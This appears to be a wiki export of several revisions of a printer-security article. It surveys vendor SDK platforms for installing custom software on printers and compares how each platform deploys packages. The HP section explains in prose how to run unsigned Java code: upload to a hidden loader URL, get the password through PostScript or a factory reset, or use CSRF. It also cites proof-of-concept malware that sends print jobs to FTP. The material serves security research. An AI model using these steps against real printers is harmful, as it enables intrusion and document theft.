<ref>''[http://www.oki.com/en/otr/2016/n227/pdf/otr-227-R05.pdf Office Solution with Multifunction Printer]'', N. Toshiyuki and T. Ito, Oki Electric Industry Co., Ltd., 2016</ref> which is based on web services was launched by Oki Data in 2013 for their MFP devices. Oki does not publish any information regarding an official developer program or publicly available SDK. == Results == On older HP laser printers, arbitrary Java bytecode can be executed as demonstrated by <ref name="phenoelit2002embedded"/> and <ref name="mueller2016printers"/>. Security is based on the password of the embedded web server which can be easily retrieved with PostScript or bypassed by restoring factory defaults. It is hard to make a reasoned statement on the security of other software platforms because of lacking access to the SDK and/or proper technical documentation. A comparison of platforms, applied technologies and – where known – software package deployment procedures is given below: {| class="wikitable" style="text-align:center" |- ! Vendor !! Platform !! Embedded Java !! Web services !! Deployment |- | style="text-align:left;" | HP | style="text-align:left;" | Chai/OXP || ✔ || ✔ | style="text-align:left;" | web server |- | style="text-align:left;" | Xerox/Dell | style="text-align:left;" | EIP || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Canon | style="text-align:left;" | MEAP || ✔ || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Brother | style="text-align:left;" | BSI || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Lexmark | style="text-align:left;" | eSF || ✔ || | style="text-align:left;" | unknown |- | style="text-align:left;" | Samsung | style="text-align:left;" | XOA || ✔ || ✔ | style="text-align:left;" | web server |- | style="text-align:left;" | Ricoh | style="text-align:left;" | ESA || ✔ || | style="text-align:left;" | unknown |- | style="text-align:left;" | Kyocera/Utax | style="text-align:left;" | HyPAS || ✔ || ✔ | style="text-align:left;" | USB drive |- | style="text-align:left;" | Konica Minolta | style="text-align:left;" | bEST || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Toshiba | style="text-align:left;" | e-Bridge || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Sharp | style="text-align:left;" | OSA || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Oki | style="text-align:left;" | sXP || || ✔ | style="text-align:left;" | unknown |- |} '''How to test for this attack?''' Obtain an SDK and write your own proof-of-concept application or find a ‘printer app’ which already does what you want (for example, automatically upload scanned documents to FTP). Also check which protection mechanisms exist to install custom software on the device. '''Who can perform this attack?''' Dependend on how software packages are deployed. ---- fe14d2ed82db443c1548b2d7ba4f54193c45b0f9 282 281 2017-01-28T17:21:58Z Admin 1 wikitext text/x-wiki In the recent years, printer vendors have started to introduce the '''possibility to install custom software on their devices'''. The format of such ‘printer apps’ is proprietary and SDKs are not available to the public. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors, not for end-users. Hereby a printer fleet can be adapted to the special needs and business processes of a company; document solution providers can easily integrate printers into their management software. One popular example is ''NSi AutoStore'' <ref>''[http://www.notablesolutions.com/products/nsi-autostore/ NSi AutoStore]'', Nuance Communications, Inc.</ref> which can be installed on many MFPs and automatically uploads scanned or copied documents to predefined locations. Obviously, the feature to run custom code on a printer device is a potential security thread. Furthermore code signing of software packages is potentially harder than it is for [[Firmware updates|firmware]] as software is not only written by the printer manufacturer but by a broader range of developers who need to be in possession of the secret key to sign their software. Therefore it is logical to include the secret key in SDKs which are protected by being exclusively available from developer platforms. This article is an effort to systematically gather information on vendor-specific software platforms/SDKs. == Vendors == In the following a rough outline on the software platforms provided by major printer vendors to extend functionality of their devices is given. === HP (Chai/OXP) === HP introduced their ‘Chai Appliance Platform’ platform in 1999 to run Java applications on LaserJet printers. While an SDK had been open to the public at first <ref>''[https://www.heise.de/newsticker/meldung/Java-API-fuer-HP-Drucker-54026.html Java API für HP-Drucker]'', heise online, 2001</ref>, access was later restricted to members of HP's developer network. Chai servlets which come as <code>.jar</code> files which originally needed to be certified and signed by HP before they would be accepted by a printer device. <ref name="phenoelit2002embedded">''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> discovered a flaw in the deployment process: By installing ''EZloader'' – an alternative loader software provided by HP which had already been signed – they were able to upload and run their own, unsigned Java packages. As it seems, code signing was completely dropped by HP for later Chai versions: <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 59</ref> were able to write and execute a proof-of-concept printer malware which listens on port 9100 and uploads incoming documents to an FTP server before printing them. Their code is based on <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended the device to support load-balancing and included the required SDK files and proprietary Java libraries in their demonstration. With the libraries, arbitrary Java code can be complied and executed on older HP LaserJets by uploading the <code>.jar</code> files to a ‘hidden’ URL: <code>http://printer/hp/device/this.loader</code>. This attack can be carried out if no password has yet been set for the embedded web server. Otherwise, the password must first be retrieved from <code>/dev/rdsk_jdi_cfg0</code> with PostScript (see [[file system access]]) or bypassed by resetting the device to [[factory defaults]]. A web attacker can upload the <code>.jar</code> file using [https://en.wikipedia.org/wiki/Cross-site_request_forgery CSRF] if the victim is currently logged into the printer's embedded web server. For newer devices, HP uses the web services based ‘Open Extensibility Platform’ ([https://developers.hp.com/oxp/ OXP]) instead of Chai of which no SDK is publicly available. === Canon (MEAP) === The ‘Multifunctional Embedded Application Platform’ ([http://www.developersupport.canon.com/faq/335#t335n18 MEAP]) is a Java-based software platform introduced by Canon in 2003 for their imageRunner series and extended to web services in 2010. Third party developers can obtain the MEAP [http://developersupport.canon.com/content/meap-sdk-0 SDK] for a fee of ''$5,000'' which is certainly out of scope for research purposes. === Xerox/Dell (EIP) === The ‘Extensible Interface Platform’ ([http://www.office.xerox.com/eip/enus.html EIP]) <ref>''[http://www.it-executive.nl/images/downloads/Extensible%20Interface.pdf From Peripheral To Platform: MFP Software Development Tools and Xerox's Extensible Interface Platform]'', B. Bissett, 2016</ref> was announced in 2006 by Xerox for various MFPs. The architecture – which is also supported by a few rebadged Dell devices – is based on web services technology. The [http://www.office.xerox.com/eip/enus.html SDK] is freely available for registered developers. === Brother (BSI) === The ‘Brother Solutions Interface’ ([https://www.brother-usa.com/lp/civ/bsi.aspx BSI]) is an XML-based web architecture launched in 2012 for scanners, copiers and printers. Access to the [https://www.brother-usa.com/lp/civ/home.aspx SDK] is available to licensed developers. === Lexmark (eSF) === The ‘Embedded Solution Framework’ ([http://www.lexmark-emea.com/usa/BSD_solution_catalouge.pdf eSF]) was launched in 2006 for Lexmark MFPs. The SDK to develop Java applications is reserved for ‘specially qualified partners’. According to <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref> ‘these applications must be digitally signed by Lexmark before being adopted’ using 2048-bit RSA signatures. === Samsung (XOA) === The ‘eXtensible Open Architecture’ ([http://samsungprintingsolutions.com/2015/02/can-samsungs-extensible-open-architecture-xoa/ XOA]) was introduced by Samsung in 2008 and comes in two flavours: the XOA-E Java virtual machine and the web services based XOA-Web. The [http://xoapartnerportal.com/ SDK] is only available to Samsung resellers. === Ricoh (ESA) === The ‘Embedded Software Architecture’ ([https://www.ricoh.com/esa/ ESA]) <ref>''[http://ricoh.com/esa/pdf/white_letter.pdf White Paper: Embedded Software Architecture SDK]'', Ricoh Company, Ltd., 2014</ref> was launched by Ricoh in 2004. The Java based [http://www.ricoh-developer.com/content/device-sdk-type-j-sdkj-overview SDK/J] is available to developers after a registration. === Kyocera/Utax (HyPAS) === The ‘Hybrid Platform for Advanced Solutions’ ([http://usa.kyoceradocumentsolutions.com/americas/jsp/Kyocera/hypas_overview.jsp HyPAS]) <ref>''[http://www.officeproductnews.net/sites/default/files/imce/KyoceraWhitepaper_0.pdf Kyocera's HyPAS Technology – A Whitepaper]'', Kyocera Corp., 2013</ref> has been released by Kyocera in 2008. Applications are based either on Java or on web services. The [https://www.kyoceradocumentsolutions.eu/index/document_solutions/HyPAS/hypas_developer_partner.html SDK] is only available for members of the ‘HyPAS Development Partner Programme’ and applications have to be approved by Kyocera. === Konica Minolta (bEST) === The ‘bizhub Extended Solution Technology’ ([https://best.kmbs.us/ bEST]) <ref>''[http://www.biz.konicaminolta.com/technologies/best/pdf/bEST_Whitepaper.pdf Konica Minolta's bizhub Extended Solution Technology (bEST) Software Development Platform for MFPs]'', B. Bissett, 2009</ref> which is based on web services was introduced by Konica Minolta in 2009. Access to the [https://best.kmbs.us/pages/levels.php SDK] requires ‘platinum membership level’ in the developer program for a fee of ''$4,000'' which is out of scope for independent researchers. === Toshiba (e-BRIDGE) === The ‘e-BRIDGE Open Platform’ ([http://www.estudio.com.sg/solutions_ebridge.aspx e-BRIDGE]) was released by Toshiba in 2008 to customize their high-end MFPs based on web services technology. An SDK is not available to the general public. === Sharp (OSA) === The ‘Open Systems Architecture’ ([http://siica.sharpusa.com/Document-Systems/Sharp-OSA OSA]) <ref>''[http://www.kelo-kopiertechnik.de/uploads/prospekte/loesungen/Prospekt OSA.pdf Sharp OSA – Informationen für Sharp Fachhändler]'', Sharp K.K., 2009</ref> was announced by Sharp in 2004. The [http://sharp-partners.com/us/PartnerPrograms/DeveloperProgram/tabid/722/Default.aspx SDK] used to develop web services is fee-based and applications need to be validated by Sharp before they can be installed on an MFP. === Oki (sXP) === The ‘smart eXtendable Platform’ ([http://www.oki.com/en/press/2014/09/z14053e.html sXP]) <ref>''[http://www.oki.com/en/otr/2016/n227/pdf/otr-227-R05.pdf Office Solution with Multifunction Printer]'', N. Toshiyuki and T. Ito, Oki Electric Industry Co., Ltd., 2016</ref> which is based on web services was launched by Oki Data in 2013 for their MFP devices. Oki does not publish any information regarding an official developer program or publicly available SDK. == Results == On older HP laser printers, arbitrary Java bytecode can be executed as demonstrated by <ref name="phenoelit2002embedded"/> and <ref name="mueller2016printers"/>. Security is based on the password of the embedded web server which can be easily readout with PostScript or bypassed by restoring factory defaults. It is hard to make a reasoned statement on the security of other software platforms because of lacking access to the SDK and/or proper technical documentation. A comparison of platforms, applied technologies and – where known – software package deployment procedures is given below: {| class="wikitable" style="text-align:center" |- ! Vendor !! Platform !! Embedded Java !! Web services !! Deployment |- | style="text-align:left;" | HP | style="text-align:left;" | Chai/OXP || ✔ || ✔ | style="text-align:left;" | web server |- | style="text-align:left;" | Xerox/Dell | style="text-align:left;" | EIP || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Canon | style="text-align:left;" | MEAP || ✔ || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Brother | style="text-align:left;" | BSI || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Lexmark | style="text-align:left;" | eSF || ✔ || | style="text-align:left;" | unknown |- | style="text-align:left;" | Samsung | style="text-align:left;" | XOA || ✔ || ✔ | style="text-align:left;" | web server |- | style="text-align:left;" | Ricoh | style="text-align:left;" | ESA || ✔ || | style="text-align:left;" | unknown |- | style="text-align:left;" | Kyocera/Utax | style="text-align:left;" | HyPAS || ✔ || ✔ | style="text-align:left;" | USB drive |- | style="text-align:left;" | Konica Minolta | style="text-align:left;" | bEST || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Toshiba | style="text-align:left;" | e-Bridge || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Sharp | style="text-align:left;" | OSA || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Oki | style="text-align:left;" | sXP || || ✔ | style="text-align:left;" | unknown |- |} '''How to test for this attack?''' Obtain an SDK and write your own proof-of-concept application or find a ‘printer app’ which already does what you want (for example, automatically upload scanned documents to FTP). Also check which protection mechanisms exist to install custom software on the device. '''Who can perform this attack?''' Dependend on how software packages are deployed. ---- 120f2081ae2799b257ecafb2cbe54f0300772389 281 197 2017-01-28T17:20:59Z Admin 1 wikitext text/x-wiki In the recent years, printer vendors have started to introduce the '''possibility to install custom software on their devices'''. The format of such ‘printer apps’ is proprietary and SDKs are not available to the public. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors, not for end-users. Hereby a printer fleet can be adapted to the special needs and business processes of a company; document solution providers can easily integrate printers into their management software. One popular example is ''NSi AutoStore'' <ref>''[http://www.notablesolutions.com/products/nsi-autostore/ NSi AutoStore]'', Nuance Communications, Inc.</ref> which can be installed on many MFPs and automatically uploads scanned or copied documents to predefined locations. Obviously, the feature to run custom code on a printer device is a potential security thread. Furthermore code signing of software packages is potentially harder than it is for firmware as software is not only written by the printer manufacturer but by a broader range of developers who need to be in possession of the secret key to sign their software. Therefore it is logical to include the secret key in SDKs which are protected by being exclusively available from developer platforms. This article is an effort to systematically gather information on vendor-specific software platforms/SDKs. == Vendors == In the following a rough outline on the software platforms provided by major printer vendors to extend functionality of their devices is given. === HP (Chai/OXP) === HP introduced their ‘Chai Appliance Platform’ platform in 1999 to run Java applications on LaserJet printers. While an SDK had been open to the public at first <ref>''[https://www.heise.de/newsticker/meldung/Java-API-fuer-HP-Drucker-54026.html Java API für HP-Drucker]'', heise online, 2001</ref>, access was later restricted to members of HP's developer network. Chai servlets which come as <code>.jar</code> files which originally needed to be certified and signed by HP before they would be accepted by a printer device. <ref name="phenoelit2002embedded">''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> discovered a flaw in the deployment process: By installing ''EZloader'' – an alternative loader software provided by HP which had already been signed – they were able to upload and run their own, unsigned Java packages. As it seems, code signing was completely dropped by HP for later Chai versions: <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 59</ref> were able to write and execute a proof-of-concept printer malware which listens on port 9100 and uploads incoming documents to an FTP server before printing them. Their code is based on <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended the device to support load-balancing and included the required SDK files and proprietary Java libraries in their demonstration. With the libraries, arbitrary Java code can be complied and executed on older HP LaserJets by uploading the <code>.jar</code> files to a ‘hidden’ URL: <code>http://printer/hp/device/this.loader</code>. This attack can be carried out if no password has yet been set for the embedded web server. Otherwise, the password must first be retrieved from <code>/dev/rdsk_jdi_cfg0</code> with PostScript (see [[file system access]]) or bypassed by resetting the device to [[factory defaults]]. A web attacker can upload the <code>.jar</code> file using [https://en.wikipedia.org/wiki/Cross-site_request_forgery CSRF] if the victim is currently logged into the printer's embedded web server. For newer devices, HP uses the web services based ‘Open Extensibility Platform’ ([https://developers.hp.com/oxp/ OXP]) instead of Chai of which no SDK is publicly available. === Canon (MEAP) === The ‘Multifunctional Embedded Application Platform’ ([http://www.developersupport.canon.com/faq/335#t335n18 MEAP]) is a Java-based software platform introduced by Canon in 2003 for their imageRunner series and extended to web services in 2010. Third party developers can obtain the MEAP [http://developersupport.canon.com/content/meap-sdk-0 SDK] for a fee of ''$5,000'' which is certainly out of scope for research purposes. === Xerox/Dell (EIP) === The ‘Extensible Interface Platform’ ([http://www.office.xerox.com/eip/enus.html EIP]) <ref>''[http://www.it-executive.nl/images/downloads/Extensible%20Interface.pdf From Peripheral To Platform: MFP Software Development Tools and Xerox's Extensible Interface Platform]'', B. Bissett, 2016</ref> was announced in 2006 by Xerox for various MFPs. The architecture – which is also supported by a few rebadged Dell devices – is based on web services technology. The [http://www.office.xerox.com/eip/enus.html SDK] is freely available for registered developers. === Brother (BSI) === The ‘Brother Solutions Interface’ ([https://www.brother-usa.com/lp/civ/bsi.aspx BSI]) is an XML-based web architecture launched in 2012 for scanners, copiers and printers. Access to the [https://www.brother-usa.com/lp/civ/home.aspx SDK] is available to licensed developers. === Lexmark (eSF) === The ‘Embedded Solution Framework’ ([http://www.lexmark-emea.com/usa/BSD_solution_catalouge.pdf eSF]) was launched in 2006 for Lexmark MFPs. The SDK to develop Java applications is reserved for ‘specially qualified partners’. According to <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref> ‘these applications must be digitally signed by Lexmark before being adopted’ using 2048-bit RSA signatures. === Samsung (XOA) === The ‘eXtensible Open Architecture’ ([http://samsungprintingsolutions.com/2015/02/can-samsungs-extensible-open-architecture-xoa/ XOA]) was introduced by Samsung in 2008 and comes in two flavours: the XOA-E Java virtual machine and the web services based XOA-Web. The [http://xoapartnerportal.com/ SDK] is only available to Samsung resellers. === Ricoh (ESA) === The ‘Embedded Software Architecture’ ([https://www.ricoh.com/esa/ ESA]) <ref>''[http://ricoh.com/esa/pdf/white_letter.pdf White Paper: Embedded Software Architecture SDK]'', Ricoh Company, Ltd., 2014</ref> was launched by Ricoh in 2004. The Java based [http://www.ricoh-developer.com/content/device-sdk-type-j-sdkj-overview SDK/J] is available to developers after a registration. === Kyocera/Utax (HyPAS) === The ‘Hybrid Platform for Advanced Solutions’ ([http://usa.kyoceradocumentsolutions.com/americas/jsp/Kyocera/hypas_overview.jsp HyPAS]) <ref>''[http://www.officeproductnews.net/sites/default/files/imce/KyoceraWhitepaper_0.pdf Kyocera's HyPAS Technology – A Whitepaper]'', Kyocera Corp., 2013</ref> has been released by Kyocera in 2008. Applications are based either on Java or on web services. The [https://www.kyoceradocumentsolutions.eu/index/document_solutions/HyPAS/hypas_developer_partner.html SDK] is only available for members of the ‘HyPAS Development Partner Programme’ and applications have to be approved by Kyocera. === Konica Minolta (bEST) === The ‘bizhub Extended Solution Technology’ ([https://best.kmbs.us/ bEST]) <ref>''[http://www.biz.konicaminolta.com/technologies/best/pdf/bEST_Whitepaper.pdf Konica Minolta's bizhub Extended Solution Technology (bEST) Software Development Platform for MFPs]'', B. Bissett, 2009</ref> which is based on web services was introduced by Konica Minolta in 2009. Access to the [https://best.kmbs.us/pages/levels.php SDK] requires ‘platinum membership level’ in the developer program for a fee of ''$4,000'' which is out of scope for independent researchers. === Toshiba (e-BRIDGE) === The ‘e-BRIDGE Open Platform’ ([http://www.estudio.com.sg/solutions_ebridge.aspx e-BRIDGE]) was released by Toshiba in 2008 to customize their high-end MFPs based on web services technology. An SDK is not available to the general public. === Sharp (OSA) === The ‘Open Systems Architecture’ ([http://siica.sharpusa.com/Document-Systems/Sharp-OSA OSA]) <ref>''[http://www.kelo-kopiertechnik.de/uploads/prospekte/loesungen/Prospekt OSA.pdf Sharp OSA – Informationen für Sharp Fachhändler]'', Sharp K.K., 2009</ref> was announced by Sharp in 2004. The [http://sharp-partners.com/us/PartnerPrograms/DeveloperProgram/tabid/722/Default.aspx SDK] used to develop web services is fee-based and applications need to be validated by Sharp before they can be installed on an MFP. === Oki (sXP) === The ‘smart eXtendable Platform’ ([http://www.oki.com/en/press/2014/09/z14053e.html sXP]) <ref>''[http://www.oki.com/en/otr/2016/n227/pdf/otr-227-R05.pdf Office Solution with Multifunction Printer]'', N. Toshiyuki and T. Ito, Oki Electric Industry Co., Ltd., 2016</ref> which is based on web services was launched by Oki Data in 2013 for their MFP devices. Oki does not publish any information regarding an official developer program or publicly available SDK. == Results == On older HP laser printers, arbitrary Java bytecode can be executed as demonstrated by <ref name="phenoelit2002embedded"/> and <ref name="mueller2016printers"/>. Security is based on the password of the embedded web server which can be easily readout with PostScript or bypassed by restoring factory defaults. It is hard to make a reasoned statement on the security of other software platforms because of lacking access to the SDK and/or proper technical documentation. A comparison of platforms, applied technologies and – where known – software package deployment procedures is given below: {| class="wikitable" style="text-align:center" |- ! Vendor !! Platform !! Embedded Java !! Web services !! Deployment |- | style="text-align:left;" | HP | style="text-align:left;" | Chai/OXP || ✔ || ✔ | style="text-align:left;" | web server |- | style="text-align:left;" | Xerox/Dell | style="text-align:left;" | EIP || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Canon | style="text-align:left;" | MEAP || ✔ || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Brother | style="text-align:left;" | BSI || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Lexmark | style="text-align:left;" | eSF || ✔ || | style="text-align:left;" | unknown |- | style="text-align:left;" | Samsung | style="text-align:left;" | XOA || ✔ || ✔ | style="text-align:left;" | web server |- | style="text-align:left;" | Ricoh | style="text-align:left;" | ESA || ✔ || | style="text-align:left;" | unknown |- | style="text-align:left;" | Kyocera/Utax | style="text-align:left;" | HyPAS || ✔ || ✔ | style="text-align:left;" | USB drive |- | style="text-align:left;" | Konica Minolta | style="text-align:left;" | bEST || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Toshiba | style="text-align:left;" | e-Bridge || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Sharp | style="text-align:left;" | OSA || || ✔ | style="text-align:left;" | unknown |- | style="text-align:left;" | Oki | style="text-align:left;" | sXP || || ✔ | style="text-align:left;" | unknown |- |} '''How to test for this attack?''' Obtain an SDK and write your own proof-of-concept application or find a ‘printer app’ which already does what you want (for example, automatically upload scanned documents to FTP). Also check which protection mechanisms exist to install custom software on the device. '''Who can perform this attack?''' Dependend on how software packages are deployed. ---- 2e736d129301a9d0433885d10e2d984f74826990 197 194 2017-01-23T12:17:37Z Admin 1 wikitext text/x-wiki In the recent years, printer vendors have started to introduce the '''possibility to install custom software on their devices'''. The format of such ‘printer apps’ is proprietary and SDKs are not available to the public. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors, not for end-users. Hereby a printer fleet can be adapted to the special needs and business processes of a company; document solution providers can easily integrate printers into their management software. One popular example is ''NSi AutoStore'' <ref>''[http://www.notablesolutions.com/products/nsi-autostore/ NSi AutoStore]'', Nuance Communications, Inc.</ref> which can be installed on many MFPs and automatically uploads scanned or copied documents to predefined locations. Obviously, the feature to run custom code on a printer device is a potential security thread. Furthermore code signing of software packages is potentially harder than it is for firmware as software is not only written by the printer manufacturer but by a broader range of developers who need to be in possession of the secret key to sign their software. Therefore it is logical to include the secret key in SDKs which are protected by being exclusively available from developer platforms. This article is an effort to systematically gather information on vendor-specific software platforms/SDKs. == Vendors == In the following a rough outline on the software platforms provided by major printer vendors to extend functionality of their devices is given. === HP (Chai/OXP) === HP introduced their ‘Chai Appliance Platform’ platform in 1999 to run Java applications on LaserJet printers. While an SDK had been open to the public at first <ref>''[https://www.heise.de/newsticker/meldung/Java-API-fuer-HP-Drucker-54026.html Java API für HP-Drucker]'', heise online, 2001</ref>, access was later restricted to members of HP's developer network. Chai servlets which come as <code>.jar</code> files which originally needed to be certified and signed by HP before they would be accepted by a printer device. <ref name="phenoelit2002embedded">''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> discovered a flaw in the deployment process: By installing ''EZloader'' – an alternative loader software provided by HP which had already been signed – they were able to upload and run their own, unsigned Java packages. As it seems, code signing was completely dropped by HP for later Chai versions: <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 59</ref> were able to write and execute a proof-of-concept printer malware which listens on port 9100 and uploads incoming documents to an FTP server before printing them. Their code is based on <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended the device to support load-balancing and included the required SDK files and proprietary Java libraries in their demonstration. With the libraries, arbitrary Java code can be complied and executed on older HP LaserJets by uploading the <code>.jar</code> files to a ‘hidden’ URL: <code>http://printer/hp/device/this.loader</code>. This attack can be carried out if no password has yet been set for the embedded web server. Otherwise, the password must first be retrieved from <code>/dev/rdsk_jdi_cfg0</code> with PostScript (see [[file system access]]) or bypassed by resetting the device to [[factory defaults]]. A web attacker can upload the <code>.jar</code> file using [https://en.wikipedia.org/wiki/Cross-site_request_forgery CSRF] if the victim is currently logged into the printer's embedded web server. For newer devices, HP uses the web services based ‘Open Extensibility Platform’ ([https://developers.hp.com/oxp/ OXP]) instead of Chai of which no SDK is publicly available. === Canon (MEAP) === The ‘Multifunctional Embedded Application Platform’ ([http://www.developersupport.canon.com/faq/335#t335n18 MEAP]) is a Java-based software platform introduced by Canon in 2003 for their imageRunner series and extended to web services in 2010. Third party developers can obtain the MEAP [http://developersupport.canon.com/content/meap-sdk-0 SDK] for a fee of ''$5,000'' which is certainly out of scope for research purposes. === Xerox/Dell (EIP) === The ‘Extensible Interface Platform’ ([http://www.office.xerox.com/eip/enus.html EIP]) <ref>''[http://www.it-executive.nl/images/downloads/Extensible%20Interface.pdf From Peripheral To Platform: MFP Software Development Tools and Xerox's Extensible Interface Platform]'', B. Bissett, 2016</ref> was announced in 2006 by Xerox for various MFPs. The architecture – which is also supported by a few rebadged Dell devices – is based on web services technology. The [http://www.office.xerox.com/eip/enus.html SDK] is freely available for registered developers. === Brother (BSI) === The ‘Brother Solutions Interface’ ([https://www.brother-usa.com/lp/civ/bsi.aspx BSI]) is an XML-based web architecture launched in 2012 for scanners, copiers and printers. Access to the [https://www.brother-usa.com/lp/civ/home.aspx SDK] is available to licensed developers. === Lexmark (eSF) === The ‘Embedded Solution Framework’ ([http://www.lexmark-emea.com/usa/BSD_solution_catalouge.pdf eSF]) was launched in 2006 for Lexmark MFPs. The SDK to develop Java applications is reserved for ‘specially qualified partners’. According to <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref> ‘these applications must be digitally signed by Lexmark before being adopted’ using 2048-bit RSA signatures. === Samsung (XOA) === The ‘eXtensible Open Architecture’ ([http://samsungprintingsolutions.com/2015/02/can-samsungs-extensible-open-architecture-xoa/ XOA]) was introduced by Samsung in 2008 and comes in two flavours: the XOA-E Java virtual machine and the web services based XOA-Web. The [http://xoapartnerportal.com/ SDK] is only available to Samsung resellers. === Ricoh (ESA) === The ‘Embedded Software Architecture’ ([https://www.ricoh.com/esa/ ESA]) <ref>''[http://ricoh.com/esa/pdf/white_letter.pdf White Paper: Embedded Software Architecture SDK]'', Ricoh Company, Ltd., 2014</ref> was launched by Ricoh in 2004. The Java based [http://www.ricoh-developer.com/content/device-sdk-type-j-sdkj-overview SDK/J] is available to developers after a registration. === Kyocera/Utax (HyPAS) === The ‘Hybrid Platform for Advanced Solutions’ ([http://usa.kyoceradocumentsolutions.com/americas/jsp/Kyocera/hypas_overview.jsp HyPAS]) <ref>''[http://www.officeproductnews.net/sites/default/files/imce/KyoceraWhitepaper_0.pdf Kyocera's HyPAS Technology – A Whitepaper]'', Kyocera Corp., 2013</ref> has been released by Kyocera in 2008. Applications are based either on Java or on web services. The [https://www.kyoceradocumentsolutions.eu/index/document_solutions/HyPAS/hypas_developer_partner.html SDK] is only available for members of the ‘HyPAS Development Partner Programme’ and applications have to be approved by Kyocera. === Konica Minolta (bEST) === The ‘bizhub Extended Solution Technology’ ([https://best.kmbs.us/ bEST]) <ref>''[http://www.biz.konicaminolta.com/technologies/best/pdf/bEST_Whitepaper.pdf Konica Minolta's bizhub Extended Solution Technology (bEST) Software Development Platform for MFPs]'', B. Bissett, 2009</ref> which is based on web services was introduced by Konica Minolta in 2009. Access to the [https://best.kmbs.us/pages/levels.php SDK] requires ‘platinum membership level’ in the developer program for a fee of ''$4,000'' which is out of scope for independent researchers. === Toshiba (e-BRIDGE) === The ‘e-BRIDGE Open Platform’ ([http://www.estudio.com.sg/solutions_ebridge.aspx e-BRIDGE]) was released by Toshiba in 2008 to customize their high-end MFPs based on web services technology. An SDK is not available to the general public. === Sharp (OSA) === The ‘Open Systems Architecture’ ([http://siica.sharpusa.com/Document-Systems/Sharp-OSA OSA]) <ref>''[http://www.kelo-kopiertechnik.de/uploads/prospekte/loesungen/Prospekt OSA.pdf Sharp OSA – Informationen für Sharp Fachhändler]'', Sharp K.K., 2009</ref> was announced by Sharp in 2004. The [http://sharp-partners.com/us/PartnerPrograms/DeveloperProgram/tabid/722/Default.aspx SDK] used to develop web services is fee-based and applications need to be validated by Sharp before they can be installed on an MFP. === Oki (sXP) === The ‘smart eXtendable Platform’ ([http://www.oki.com/en/press/2014/09/z14053e.html sXP]) <ref>''[http://www.oki.com/en/otr/2016/n227/pdf/otr-227-R05.pdf Office Solution with Multifunction Printer]'', N. Toshiyuki and T. Ito, Oki Electric Industry Co., Ltd., 2016</ref> which is based on web services was launched by Oki Data in 2013 for their MFP devices. Oki does not publish any information regarding an official developer program or publicly available SDK. == Results == On older HP laser printers, arbitrary Java bytecode can be executed as demonstrated by <ref name="phenoelit2002embedded"/> and <ref name="mueller2016printers"/>. Security is based on the password of the embedded web server which can be easily readout with PostScript or bypassed by restoring factory defaults. It is hard to make a reasoned statement on the security of other software platforms because of lacking access to the SDK and/or proper technical documentation. A comparison of platforms, applied technologies and – where known – software package deployment procedures is given below: {| class="wikitable" style="text-align:center" |- ! Vendor !! Platform !! Embedded Java !! Web services !! Deployment |- | HP || Chai/OXP || ✔ || ✔ || web server |- | Xerox/Dell || EIP || || ✔ || ? |- | Canon || MEAP || ✔ || ✔ || ? |- | Brother || BSI || || ✔ || ? |- | Lexmark || eSF || ✔ || || ? |- | Samsung || XOA || ✔ || ✔ || web server |- | Ricoh || ESA || ✔ || || ? |- | Kyocera/Utax || HyPAS || ✔ || ✔ || USB drive |- | Konica Minolta || bEST || || ✔ || ? |- | Toshiba || e-Bridge || || ✔ || ? |- | Sharp || OSA || || ✔ || ? |- | Oki || sXP || || ✔ || ? |- |} '''How to test for this attack?''' Obtain an SDK and write your own proof-of-concept application or find a ‘printer app’ which already does what you want (for example, automatically upload scanned documents to FTP). Also check which protection mechanisms exist to install custom software on the device. '''Who can perform this attack?''' Dependend on how software packages are deployed. ---- 460ea46a2d91ac2fdb6c975ceb14806ac6548aef 194 191 2017-01-23T12:08:24Z Admin 1 wikitext text/x-wiki In the recent years, printer vendors have started to introduce the '''possibility to install custom software on their devices'''. The format of such ‘printer apps’ is proprietary and SDKs are not available to the public. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors, not for end-users. Hereby a printer fleet can be adapted to the special needs and business processes of a company; document solution providers can easily integrate printers into their management software. One popular example is ''NSi AutoStore'' <ref>''[http://www.notablesolutions.com/products/nsi-autostore/ NSi AutoStore]'', Nuance Communications, Inc.</ref> which can 